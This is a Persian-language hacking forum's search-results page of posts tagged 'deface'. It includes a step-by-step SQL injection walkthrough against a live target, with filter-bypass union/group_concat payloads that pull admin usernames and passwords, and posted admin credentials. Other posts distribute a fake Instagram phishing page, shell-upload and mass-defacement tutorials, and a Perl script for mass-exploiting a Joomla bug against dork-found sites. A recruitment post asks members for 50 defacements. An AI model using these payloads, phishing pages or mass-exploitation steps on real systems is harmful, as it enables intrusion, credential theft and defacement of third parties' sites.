جستجو در تالارهای گفتگو
در حال نمایش نتایج برای برچسب های 'دیفیس'.
20 نتیجه پیدا شد
-
دیفیس های ثبت شده در aljyyosh.org , zone-deface.com
kingdeface پاسخی ارسال کرد برای یک موضوع در قوانین و اطلاعیه های سایت
در این تاپیک تمامیه لینک اثبات سایتهای دیفیس شده توسط تیم امنیتی گارد ایران که در سایتهای ثبت دیفیس بغیر از Zone-h.org هستند قرار خواهد گرفت و این سایتها شامل : [Hidden Content] و [Hidden Content] موفق باشین -
اصطلاحات هک و امنیت
Zed پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
× حفره امنیتی و یا همان باگ چیست ؟ » به نقص ها و سهل انگاری های برنامه نویسان، طراحان وب سایت ها، در کارهای خود به جای میگذارند، نفوذگر آنها را پیدا کرده و از طریق این حفره ها اقدام به نفوذ میکند را باگ می گویند ! × تارگت چیست ؟ » معنی اصلی این کلمه یعنی هدفی که از قبل تعیین شده، به طور مثال نفوذگر پس از جمع آوری کامل اطلاعات از یک وب سایت فهمیده است که این وب سایت حفره امنیتی دارد و میتواند از طریق این حفره ها و باگ ها اقدام به نفوذ کند و آن را هدف و یا تارگت خود قرار میدهد ! × اکسپلویت چیست ؟ » به یکسری کد های مخرب که توسط مهاجم و یا همان نفوذگر نوشته میشود را اکسپلویت می نامند. × پیلود چیست ؟ » به یکسری کد های مخرب وظیفه انتقال پکتهای ارتباطی بین دو کامپیوتر یا چندبن کامپیوتر به صورت غیر مجاز را دارند پیلود میگویند. × کیلاگر چیست ؟ » نرم افرار و یا برنامه ای برای دسترسی به تمامی کلمات و یا حروفی که بر روی صفحه کلید تارگت تایپ میشود را ذخیره و برای نفوذگر ارسال میشود،این کلمات میتوان از انواع آدرس ها مانند حساب های بانکی، پسورد ها و را در نظر گرفت ! × بایپس چیست ؟ » به معنای دور زدن هست یعنی هکر با روش های خاصی موانع امنیتی را دور میزند ! × کلاینت چیست ؟ » سیستم های که از یک سرور خدمات دریافت میکنند را کلاینت های می نامند، برای مثال شما یک کلاینت هستید ! × شل چیست ؟ » در هک هنگامی که هکر با استفاده از ابزارها و کارهای خود میتونه به سیستم قربانی نفوذ کنه و کنترل سیستم رو بدست بگیره اصطلاحا میگن شل گرفته و میتونه تصمیمات خودش رو عملی کنه ! × دیفیس چیست ؟ » وقتی یه هکر سایتی رو هک میکنه ، نمای صفحه اصلی (یا بقیه صفحه های) سایت رو تغییر میده و ممکنه اسم خودش رو هم درج کنه و مسئولیت هک سایت رو بپذیره به این صفحه دیفیس پیج میگویند ! × مس دیفیس چیست ؟ » مس دیفیس هم مثل همون دیفیس هست با این فرق که شما وقتی تمام سایت های متعلق به یک سرور خاص رو دیفیس کنید میگویند مس دیفیس انجام داده اید ! × بک دور چیست ؟ » در هک وقتی یه هکر به سیستمی نفوذ کرد عمدا راه دومی برای نفوذهای بعدی در سیستم هک شده قرار میده تا اگه یوقت احیانا راه نفوذ فعلی شناسایی و بسته شد بتونه با کمک در پشتی که ایجاد کرده دوباره نفوذ کنه ! هماهنگ شده با ادمین عزیز @proxy-
- اصطلاحات هک و امنیت
- تارگت
- (و 19 مورد دیگر)
-
••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت کاربران محترم انجمن گاردایران در این تاپیک قصد دارم تارگت با نکات خاص رو خدمتتون آموزش بدم ولی قبلش باید یادآوری کنم که این آموزش ها فقط برای آشنایی و یادگیری شماست هر گونه استفاده ی غیرمجاز به عهده ی خود شماست ! در ضمن دوستان عزیزی که به ضمینه ی هک و امنیت علاقه مند هستند میتوانند این آموزش هارو دنبال کنند و با مراجعه به تاپیک های قبلی بنده میتونید این آموزش رو از اول یاد بگیرید چون در اینجا فقط به نکات اشاره خواهد شد نکته : هک ر شدن بچه بازی نیست که بخوای برای آسیب رسوندن به دیگران یا تفریح یادبگیری اگر اهدافت برای یادگیری هک اینه همین الان میتونی اینجارو ترک کنی تارگت : [Hidden Content] با قرار دادن ' آسیب پذیری مشخص خواهد شد [Hidden Content]' حال به سراغ دستورات بعدی برای پیدا کردن ستون های سایت میرویم با استفاده از دستور [Hidden Content] order by 99999-- بسیار خب میبینیم که به کلمه ی order حساس هستش پس بایپس کلمه ی order رو قرار میدیم -> group [Hidden Content] group by 99999-- صفحه load میشود در صورتی که نباید load َود چون هیچ سایتی انقدر ستون ندارد پس بایپسشو قرار میدیم [Hidden Content]' group by 99999--+ انقدر اعداد رو کم میکنیم تا صفحه load شود به 25 خواهیم رسید بدین صورت [Hidden Content]' group by 25--+ حال باید دستورات بعدی برای بیرون کشیدن database اعمال کنیم برای راحتی کارشما که شاید برنامه Hackbar روی مرورگرتون نصب نباشه لیست اعداد رو تهیه کردم که بتونید راحت جای گذاری کنید union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70 خب دستورات رو وارد میکنیم بدین شکل [Hidden Content]' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+ ولی با یک Error معروف رو به رو خواهیم شد پس با دستور /*!00000union*/ بایپس میکنیم [Hidden Content]' /*!00000union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+ خب حالا میریم سراغ بیرون کشیدن table های سایت [Hidden Content]' /*!00000union*/ select 1,2,3,4,5,6,group_concat(table_name,0x3c62723e),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=database()--+ میبینیم که دوباره با Error معروف Not Acceptable! مواجه خواهیم شد خیلی راحت با دستوراتی که خدمتتون عرض کردم بایپس کنید بدین شکل [Hidden Content]%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(table_name,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+/*!00000information_schema.tables*/+/*!00000where*/+table_schema=database()--+ سایتی رو معرفی میکنم که برای hex کردن متن کمکتون میکنه Text To Hex بسیار خب میریم سراغ دستورات بعدی شروع به hex کردن admin_log میکنیم و در دستور قرار میدیم (اگر با دستورات آشنا نیستی موضوعات قبلی تاپیک های بنده رو ببین ) [Hidden Content]%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(column_name,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+/*!00000information_schema.columns*/+/*!00000where*/+table_name=0x61646d696e5f6c6f67--+ و دستور بعد برای استخراج داده [Hidden Content]%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(uid,0x3a,upass,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+admin_log--+ دوستان عزیز لطفا از آموزش ها سو استفاده نکنید این آموزش ها فقط برای یادگیری شماست پس لطفا کسی رو دیفیس نکنید سعی میکنم هر روز یک تاپیک در مورد تارگت با نکات خاص قرار بدم لطفا در اینجا اسپم نکنید برای ادامه ی آموزش ها فقط تاپیک را بپسندید موفق باشید admin11:admin11 username & password
- 2 پاسخ
-
- sqlinjectin bypass
- دیفیس
- (و 17 مورد دیگر)
-
با سلام خدمت تمام کاربران و مدیران GUARDIRAN در این تاپیک قصد دارم یک پیج فیک اینستاگرام رو به شما دوستان عزیز بدم . فقط دوستان توجه داشته باشید که باید هر چیزی که بین این کامنت هست رو حذف کنید : <!--***************************** MR.MSA *****************************--> برای دانلود به فایل پیوست مراجعه کنید . --------------------- امید وارم از این پست لذت برده باشید و از فیک پیج اینستاگرام استفاده کرده باشید . یه مشکلات ریز داشت یه خوبی خودتون ببخشید . ******************** MR.MSA ***************** Fake Page Instagram.zip
-
درود, آموزش دیفیس(هک) وبسایت با کمک افزونه Noredirect در فایرفاکس سوالی هست زیر همین تاپیک جواب میدم امیدوارم مفید باشه و در راه آموزش استفاده شه! پسورد : guardiran.org Goodzilam.part1.rar Goodzilam.part2.rar
-
آموزش تصویری دیفیس سایت
Goodzilam پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
درود آموزش تصویری دیفیس سایت رو اماده کردم 😉 که شامل آپلود شل به وسیله پنل ادمین و بایپس لاگین پیج هست (به همراه اخرین ورژن شل آلفا) ادامه پارت ها در پست بعدی پسورد فایل: www.guardiran.org Desktop.part1.rar -
آموزش تصویری آموزش تصویری Reverse IP Lookup
mownten پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
با سلام خدمت دوستان عزیز. همونطور که میدونید دوره آموزش تصویری نفوذ به سرور تهیه شده و توی فروشگاه وبسایت قرار گرفته و آموزش هایی رو در خصوص روش های مختلف وب هکینگ و سرور هکینگ ارائه داده. درس اول این آموزش مربوط به reverse ip lookup هست. آموزش توی دوره آموزش اصلی هست و این ویدیو آموزشی هم مال زمانی هست که در زمان استفاده از ویدئوی توی دوره ی آموزشی به مشکل بر بخورید. ویدئو رو پیوست کردم حتماً ببینید. رمز عبور : guardiran.org هرگونه سوالی هم اگر داشتید به تاپیک سوال و جواب دوره مراجعه کنید. لینک تاپیک: آموزش reverse ip lookup - تیم امنیتی گاردایران -.rar-
- reverse ip lookup
- تست نفوذ به سرور
-
(و 4 مورد دیگر)
برچسب زده شده با :
-
دیفیس سایت با اپلود شل
Mr.Bl4cK پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
در این اموزش: دیفیس سایت با اپلود شل رو اموزش میدم تارگت همون dvwa هست که داخل یه هاست اپلود کردم و شما هم میتونین ازش استفاده کنین mr-bl4ck.byethost32.com هر کاری کردین بعدش درستش کنین تو رو خدا اگر هم دیدین کار میکنه بهم بگین تا برم درستش کنم کپچا هم براش گرفتم و الان قسمتش کار میکنه در ضمن قسمت باگ csrf به درستی کار میکنه اما پسورد رو عوض نمیکنه (خودم تغییرش دادم:) اگر خواستین استفاده کنین و یوزر و پس خواست: user: guardiran pass: guardiran امیدوارم از اموزش لذت ببرین Screencast_09-03-2017_05:53:32_AM.mp4 -
شرایط ویژه انتخاب مدیر بخش و مدیر شدن سریع دیفیسرها Dafcer با شرایط ویژه
kingdeface پاسخی ارسال کرد برای یک موضوع در قوانین جذب و اعلام آمادگی مدیریت هر بخش از انجمن
درود بعضی از دوستان در پیام خصوصی هاشون اعلام داشتند ما دیفیس بلدیم و شرایط ویژه برای مدیر شدن ما قرار بدین و بر این اساس تیم مدیریت انجمن گارد ایران در نظر دارد دوستانی که مایل به عضویت در تیم دیفیس انجمن گارد ایران هستند و یا اگر دوستانی باشند که مایل باشند سریعترو با شرایط ویژه تری به مدیریت بخش در تیم امنیتی گارد ایران برسند می توانند در این تاپیک رسما تخصص خودشون را مبنی بر دیفیسر بودن Defacer و یا ثبت اکسپلویت اعلام کنند و جهت انتخاب مدیریت بخش عزیزانی که دارای این چنین تخصص هایی باشند در اولویت قرار دارند و شرایط ویژه شامل حال این دسته از دوستان خواهد شد . همچنین اگر دوستانی هم مایل هستند در بخش های دیگر انجمن مدیریت بخش را بعهده بگیرند می توانند از اینجا قوانین مربوطه را مطالعه کنند و سپس در اینجا هم اعلام آمادگی خود را رسما اعلام کنند تا فعالیتهای این دوستان مورد بررسی قرار بگیرد . شرایط ثبت اکسپلویت : 1- بنام تیم امنیتی گارد ایران به ثبت برسد . 2- ترجیحا در سایت های جهانی exploit-db و ... به ثبت برسد امتیاز بالاتری خواهد داشت . --------------------------------------------------------- شرایط عضویت در تیم دیفیس گروه امنیتی گارد ایران : 1- هک تارگت های ایرانی بکلی ممنوع می باشد و برخورد شدید خواهد شد . 2- تنها کسانی که در این بخش اعلام آمادگی کرده اند می توانند از شرایط ویژه مدیریت بخش برخوردار شوند . 3- کسانی عضو تیم دیفیس Deface خواهند شد که حداقل 50 دیفیس به نام تیم امنیتی گارد ایران ثبت کرده باشند . 4- در تمامیه دیفیس ها باید از صفحه دیفیس اختصاصی تیم امنیتی گارد ایران استفاده شود . 5- تارگتهای دیفیس شده باید در [Hidden Content] ثبت شوند . مدیریت کل تیم امنیتی گارد ایران در همین بخش رسما اعلام میدارد تمامیه دیفیس هایی که بدون هماهنگی تیم مدیریت کل گارد ایران انجام شود هرگز مورد قبول نخواهد بود و در صورت بروز هرگونه مشکل قانونی اعم از شکایات و... بابت تارگتهای دیفیس شده , هرگز گذشت نخواهد شد و همچنین مدیریت گارد ایران هم از جمله شاکیان خواهند بود و به شدت از طریق مراجع قانونی برخورد خواهد شد . با تشکر و با آرزوی موفقیت .- 25 پاسخ
-
- جذب تیم دیفیس گارد ایران
- ه سایت و Deface
- (و 8 مورد دیگر)
-
با عرض سلام خدمت اعضای محترم انجمن گارد ایران بنده در این تاپیک قصد دارم تا شما رو با طراحی یک صفحه دیفیس با زبان html اشنا کنم و از عزیزانی که قصد اموزش ساخت دیفیس دارند میتونند در همین تاپیک اقدام به اموزش کنند با تشکر
-
سلام خدمت کاربران گرامی اخبار زیر هم اکنون در سایت های مختلف دیگر اعلام گردیده است ... سازمان بین المللی انرژی اتمی / IAEA میگوید ۲ یا ۳ سال قبل، حملهای موفقیتآمیز به یکی از کارخانههای هستهای را در کنار تلاش ۴ سال قبل برای سرقت فیزیکی اورانیوم غنیشده برای ساخت بمب به ثبت رسانده است. به گزارش پایگاه خبری فناوری اطلاعات برسام و به نقل ازخبر آنلاین ، آمانو همزمان با ملاقات از آلمان و دیدار با وزیر خارجه آلمان این موضوع را به رویترز گفت و افزود این نوع حملات شاید بهظاهر و بر اساس دانستههای ما خطر جدی را به دنبال نداشته است. وی بدون ذکر جزییات بیشتر از این حادثه تأکید کرد به دنبال این حادثه با توقف موقت عملیات کارخانه مواجه شدیم اما در کارخانه با رعایت اصول امنیتی بیشتر بهکار خود ادامه داد و بهاصطلاح حملهای اختلال آمیز/ disruptive بود نه تخریب آمیز/ destructive (از این اصطلاح برای حمله سایبری سال ۲۰۱۴ به سونی پیکچرز استفاده میشود) گفتنی است در سال ۲۰۱۴ تأسیسات اتمی Hydro & Nuclear Power در کره موردحمله سایبری قرار گرفت و عملیات تولید انرژی دچار اختلال شد. در آن زمان حمله کنندگان قصد سرقت آنلاین دیتای ساخت انرژی اتمی را داشتند و کره شمالی در مظان اتهام قرار گرفت. امسال نیز کارخانه هستهای Gundremmingen در آلمان با بدافزار موردحمله سایبری قرار گرفت اما برخلاف استاکس نت (اولین سلاح دیجیتال رسمی دولت آمریکا و اسرائیل علیه تأسیسات هستهای ایران) قدرت چندانی نداشت. سازمان IAEA تاکنون به ۱۰ هزار نفر اصول امنیت فیزیکی و سایبری را آموزش داده است. یا حق
-
- هک شدن کارخانه هسته ای
- هک
-
(و 7 مورد دیگر)
برچسب زده شده با :
-
سلام دیفیس ادیت شده توسط خودم نمیدونستم کدوم بخش باید بزار مخودتون تغییر بدین بخش رو اگه اشتباهه Hacked By mamad.html
-
دیفیس سایت
mamad022 پاسخی ارسال کرد برای یک موضوع در سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
سلام دوستان مثلا سایتی هست که دیفیس بشه ولی به دیتابیس اطلاعات سایت نتونیم نفوذ کنیم فقط دیفیسش کنیم چجوریه سایتش هم دامنه بداره وبلاگ نباشه مثلا؟ -
تو این موضوع یک صفحه دیفیس براتون میزارم که خیلی حرفه ای و قشنگه
-
سلام خدمت تمامی دوستان و ادمین های محترم گارد ایران نه قصد خودنمایی دارم نه هیچی دوستان و ادمین های محترم امروزه دیفیس اختصاصی یک تیم خیلی مهمه هم توی جذب افراد برای تیم هم طرز فکر دیگر تیمها و هم قدرت یک تیم . من امروز دیفیس اختصاصی تیمو دیدم یکم جا خوردم . راستش یکم زیادی ساده هستش من نمیگم عوض کنید من فقط پیشنهاد میدم . شما خودتون مقایسه کنید . با دیفیس های دیگر تیم ها .
-
آموزش مس دیفیس
DeMoN پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
سلام خدمت دوستان عزیز گارد ایران. خوب دوستان,براتون آموزشی مفید رو آماده کردم که امیدوارم به دردتون بخوره.آموزش کامل مس دیفیس. pass:guardiran.org برای استفاده از آموزش ها ابتدا تمامی پارت ها را دانلود کرده و در یک پوشه اکسترکت نمایید. لینک ابزار پوتی پیشنهاد میکنم دوستانی که اطلاعاتی در این زمینه ندارن ابتدا لینک زیر رو مشاهده کند. لینک آموزش سیملینک زدن برای خواندن فایلهای کنفیگ رو هم قرار دادم. سیملینک یا حق manual mass deface.part1.rar manual mass deface.part2.rar manual mass deface.part3.rar- 1 پاسخ
-
- آموزش دیفیس زدن
- سایت هکینگ
-
(و 6 مورد دیگر)
برچسب زده شده با :
-
این اسکریپت همونطور که از اسمش پیداس برای باگ com_tag نوشته شده که می تونید اموزش روش دستیش رو از اینجا ببینید [Hidden Content] خب حالا طرز استفاده از اسکریپت: اول دورک زیر رو سرچ کنید inurl:index.php?option=com_tag حالا چنتا تارگت انتخاب کنید و ادرسشون رو توی یک فایل ذخیره کنید (به همراه http:// و / اخر) مثل زیر /[Hidden Content] حالا برای هک کافیه تو cmd بزنید perl com_tag.pl targets.txt targets.txt همون فایلیه که شما ادرس تارگت هارو توش ذخیره کردید بقیه کار هارو اسکریپت انجام می ده و نتیجه رو براتون می نویسه com_tag.rar
-
- اکسپلویت هک سایت
- کرک هش جوملا
-
(و 8 مورد دیگر)
برچسب زده شده با :
-
آموزش هک سایت با باگ DNN
NeX.LINUX پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
..:: به نام خدا ::.. با ســلام خدمت کاربران محترم و مدیران سایــت امنیتی گــارد ایــران . امروز بنده آموزش یکی از باگ های قدیمی DNN که مخفف شده DotNetNuke است رو برای شما دوستان عزیز قرار می دهم . از دوستان عزیز درخواست میشه که داخل تاپیک سوال نپرسن و اسپم ایجاد نکنند و سوالات را در بخش پرسش و پاسخ نفوذ به سایت ها و سرورها مطرح کنید تاپیک دیگری هم برای دورک های باگ DNN هم زده خواهد شد . با تشکر . پسورد فایل : guardiran.orgDnn Bug Site Hacking.rar -
برنامه sql paizon نرم افزار خوب برای هک سایت
Mehran_FLash پاسخی ارسال کرد برای یک موضوع در اسکنرها Scanners
سلام بر همه دوستان با یه نرم افزار خیلی جالب در خدمت شما هستم اسم : sql paizon قابلیت ها : پیدا کردن سایت ها با باگ های : sql , lfi , rfi یعنی به این صورت هست که شما دورک رو بهش میدید و سایت های آسیب پذیر رو پیدا میکنه آموزش استفاده از نرم افزار : آموزش تصویری sql paizon پسورد فایل فشرده : guardiran.org موفق باشید sql paizon.rar-
- باگ هک سایت
- باگ sql injection
- (و 8 مورد دیگر)